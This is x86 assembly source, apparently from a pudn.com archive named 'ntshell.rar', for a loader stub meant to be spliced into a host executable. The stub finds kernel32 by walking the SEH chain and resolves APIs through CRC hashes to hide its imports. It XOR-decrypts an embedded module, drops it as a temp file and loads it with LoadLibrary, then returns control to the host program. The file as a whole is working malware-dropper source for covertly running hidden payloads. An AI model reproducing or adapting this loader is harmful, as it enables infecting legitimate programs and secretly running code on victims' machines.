www.pudn.com > ntshell.rar > ntshldr.asm
.486p .model flat, stdcall option casemap :none ;-------------------------------------------------------- CRC16 MACRO string CRC_VALUE = 0ffffffffh IRPC CRC_BYTE, string CRC_VALUE = CRC_VALUE xor '&CRC_BYTE' REPT 8 CRC_VALUE = (CRC_VALUE shr 1) xor ((CRC_VALUE and 1) * 0edb88320h) ENDM ENDM CRC_VALUE = CRC_VALUE xor 0ffffffffh dw (CRC_VALUE and 0ffffh) ENDM APIDEF MACRO sym CRC16 sym sym = [ebp + COUNT] COUNT = COUNT + 4 ENDM VARDEF MACRO sym, vw sym = COUNT COUNT = COUNT + vw ENDM ;-------------------------------------------------------- .CODE ;**************************************************************************** ; ??? ;**************************************************************************** _MiniLoaderStart: push 12345678h HostEntryPoint = $ - 4 call SubEnter mov eax, esp xchg esi, eax lodsd cmp eax, -1 jne $ - 5 ;查找SEH链尾 mov edx, [esi] SearchKernel32: dec edx xor dx, dx cmp word ptr [edx], 'ZM' jne SearchKernel32 mov ecx, [edx + 3ch] cmp dword ptr [edx + ecx], 'EP' jne SearchKernel32 ;查找KERNEL32基地址 call $ + 5 pop eax sub eax, $ - vdelta - 1 ;全局重定位 enter 80h, 0 mov [ebp + var_delta], eax lea esi, [eax + KNLAPILIST - vdelta] mov edi, esp call GetApiAddressFromList ;查找需要的API地址 mov edi, 260 sub esp, edi push esp ;lpBuffer push edi ;nBufferLength call GetTempPathA mov eax, esp sub esp, edi push esp ;lpTempFileName push 0 ;wUnique call $ + 8 ;lpPrefixString db "SH", 0 push eax ;lpszPath call GetTempFileNameA ;获取临时文件名 mov eax, esp push ebx ;NULL push ebx ;0 push 2 ;CREATE_ALWAYS push ebx ;NULL push 0 ;0 push 40000000h ;GENERIC_WRITE push eax ;lpFileName call CreateFileA mov [ebp + var_hFile], eax inc eax jz HostReturn ;创建文件失败? sub esi, KNLAPILIST - ModuleEntry lodsd ;读取模块长度 xchg ebx, eax sub esp, 1000h mov edi, esp LoopDecryptModule: mov ecx, 1000h cmp ebx, ecx jnb $ + 4 mov ecx, ebx push ecx push edi lodsb xor al, 3ch ;解密模块文件 stosb loop $ - 4 pop edi pop ecx sub ebx, ecx push esp ;临时变量 mov eax, esp push 0 ;lpOverlapped push eax ;lpNumberOfBytesWritten push ecx ;nNumberOfBytesToWrite push edi ;lpBuffer push dword ptr [ebp + var_hFile] ;hFile call WriteFile pop eax ;平衡堆栈 test ebx, ebx jnz LoopDecryptModule add esp, 1000h push dword ptr [ebp + var_hFile] ;hFile call CloseHandle push esp ;lpLibFileName call LoadLibraryA ;载入解密后的模块 HostReturn: leave jmp SubLeave ;跳回宿主入口 ;**************************************************************************** ; ??? ;**************************************************************************** SubEnter: pushad xor ebx, ebx call InstallSEH pop eax ;异常处理 pop eax pop esp SubLeave: xor ebx, ebx pop dword ptr fs:[ebx] pop eax popad add esp, 4 ret InstallSEH: push dword ptr fs:[ebx] mov fs:[ebx], esp jmp [esp + 28h] ;调用SubEnter时的返回地址 ;**************************************************************************** ; ??? ;**************************************************************************** GetApiAddressFromList: pushad mov ecx, [edx + 3ch] add ecx, edx mov ebx, [ecx + 78h] ;ExporyTableAddress add ebx, edx or ebp, -1 ;计数寄存器 SearchNextAPI: mov ecx, [ebx + 20h] ;AddressOfNames add ecx, edx ContinueSearch: inc ebp mov eax, edx add eax, [ecx + ebp * 4] ;取API名称字符串 call vStrToCRC cmp [esi], ax jne ContinueSearch mov eax, [ebx + 24h] ;AddressOfNameOrdinals add eax, edx movzx eax, word ptr [eax + ebp * 2] mov ecx, [ebx + 1ch] ;AddressOfFunctions add ecx, edx mov eax, [ecx + eax * 4] add eax, edx stosd ;保存API地址 inc esi inc esi cmp byte ptr [esi], 0 ;API名的CRC16列表以单个0结束 jne SearchNextAPI popad ret ;-------------------------------------------------------- CRC32: push ecx push edx push edi xchg eax, edi jmp @1 vStrToCRC: push ecx push edx push edi xchg edi, eax xor eax, eax or ecx, -1 repne scasb not ecx dec eax sub edi, ecx dec ecx @1: xor al, [edi] inc edi mov dl, 8 @2: shr eax, 1 jnc @3 xor eax, 0edb88320h @3: dec dl jnz @2 loop @1 pop edi pop edx pop ecx not eax ret ;******************************************************** vdelta: ;******************************************************** COUNT = -80h KNLAPICALL = COUNT KNLAPILIST: APIDEF CloseHandle APIDEF CreateFileA APIDEF GetTempFileNameA APIDEF GetTempPathA APIDEF LoadLibraryA APIDEF WriteFile db 00h ;ENDLIST VARDEF var_delta, 4 VARDEF var_hFile, 4 ;-------------------------------------------------------- _MiniLoaderCodeEnd: ModuleEntry: dd 00000001h db 00h ;-------------------------------------------------------- start: jmp _MiniLoaderStart end start